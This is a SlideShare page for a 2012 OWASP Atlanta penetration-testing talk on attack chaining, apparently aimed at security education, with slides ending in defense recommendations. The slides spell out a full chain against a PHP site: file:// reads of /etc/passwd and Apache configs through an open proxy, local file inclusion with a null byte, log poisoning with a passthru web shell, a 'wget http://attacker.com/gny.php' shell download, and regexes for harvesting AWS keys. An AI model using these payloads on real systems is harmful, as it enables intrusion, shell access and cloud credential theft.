SlideShare a Scribd company logo

Attack Chaining: Advanced Maneuvers for Hack Fu

Rob Ragan
Rob Ragan

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

TechnologyDesign
1 of 72
Download to read offline
Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL 31 May 2012
About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
Penetration Test vs. Vulnerability Assessment 3  
vs. 4  
Simulate a real world attack against a target network or application. - EVERYBODY 5  
It answers the question, “could someone break in?” 6  
Penetration Testing Exploit & Penetrate Information Gathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
Step 1 – Explore 9  
Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
Attack Chaining – Maneuver 1 13  
Attack Chaining – Maneuver 1 14  
Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
Step 7 – Back to DirBuster 18  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 20  
Attack Chaining – Maneuver 2 21  
Attack Chaining – Maneuver 2 22  
Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 24  
Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
Step 12 – Poison Logs 28  
Step 12 – Poison Logs 29  
Step 12 – Poison Logs ? echo 'pre'; passthru($_GET['cmd']); echo '/pre'; ? 30  
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo 'pre';passthru( $_GET['cmd']);echo 'pre'; ? 32  
Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
Step 14 – Execute Code ? echo 'pre'; passthru('ls'); echo '/pre'; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
Attack Chaining – Maneuver 3 35  
Attack Chaining – Maneuver 3 36  
Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
Step 16 – Enjoy! 38  
Step 17 – I  want  more! ec2[^d]['][A-Z0-9]{20}['] ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] ec2.*['][A-Z0-9]{20}['] ec2(D)*['][A-Z0-9]{20}['] amazon.*['][A-Z0-9]{20}['] (amazon|ec2).*['][A-Z0-9]{20}['] amazon(D)*['][A-Z0-9]{20}['] access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40} amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}['] aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] secret.*['][A-Za-z0-9+/]{40}['] ['][A-Za-z0-9+/]{40}['].*amazon 39  
Step 18 – Amazon  AWS  Regex $this-­‐amazonService  =  new  Zend_Service_Amazon('DB3BAD768F2F11C7628',     $aws_key  =  '8AFB5AF55D1E6620EE1';     define('AMAZON_KEY',  '372B8E408D1484C538F');     if  (!defined('awsAccessKey'))  define('awsAccessKey',  '9F6EB7471C926194884');     //if  (!defined('awsAccessKey'))  define('awsAccessKey',  '4CAD89B86344CD8C26C');     define('AMAZON_AES_ACCESS_KEY_ID',  '95C95B8DC84AA24C0EC');   40  
Step 19 – AWS  Takeover 41  
Step 20 – Make  It  Your  Own 42  
Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters $1,049,000 43  
Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanently PRICELESS 44  
Attack Chaining – Hack Fu 45  
Attack Chaining – Hack Fu 46  
Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
Web à Mass Malware Deployment 48  
Web à Data Center Compromise 49  
Web à Internal Network Compromise 50  
Internal Assessmentà SSN Bank #’s 51  
Infrastructure Review 52  
Step 1 – Target Wireless 53  
Step 1 – Target Wireless 54  
Step 2 – Port Scan 55  
Step 3 – Test Default Creds 56  
Infrastructure Apocalypse 57  
Step 4 – Control AP 58  
Step 5 – Read All E-mail 59  
Step 6 – Listen To VOIP 60  
Step 7 – Open All Doors 61  
Step 7 – Open All Doors 62  
63  
Step 7 – Server Room Door 64  
Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
How Do You Get Better? 68  
Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
Attack Visualization LIKE BOBBY FISCHER 70  
Thank You 72  

Recommended

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 

Recommended

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
In graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesIn graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesMohammed A. Imran
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASPGrupo Gesfor I+D+i
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerCloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 

More Related Content

What's hot

[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
In graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesIn graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesMohammed A. Imran
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 

What's hot (20)

[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Flashack
FlashackFlashack
Flashack
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполнения
 
In graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesIn graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challenges
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web Attacks
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 

Viewers also liked

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerCloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Bishop Fox
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingRob Ragan
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks RevealedEmma Brudner
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentationpreethi_madhan
 

Viewers also liked (8)

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerCloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response Plans
 
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of Bing
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentation
 

Similar to Attack Chaining: Advanced Maneuvers for Hack Fu

OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Resultsjtmelton
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisIan G
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!Nahidul Kibria
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Mitigating Exploits Using Apple's Endpoint Security
Mitigating Exploits Using Apple's Endpoint SecurityMitigating Exploits Using Apple's Endpoint Security
Mitigating Exploits Using Apple's Endpoint SecurityCsaba Fitzl
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Githubhubx
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 
Security Tips to run Docker in Production
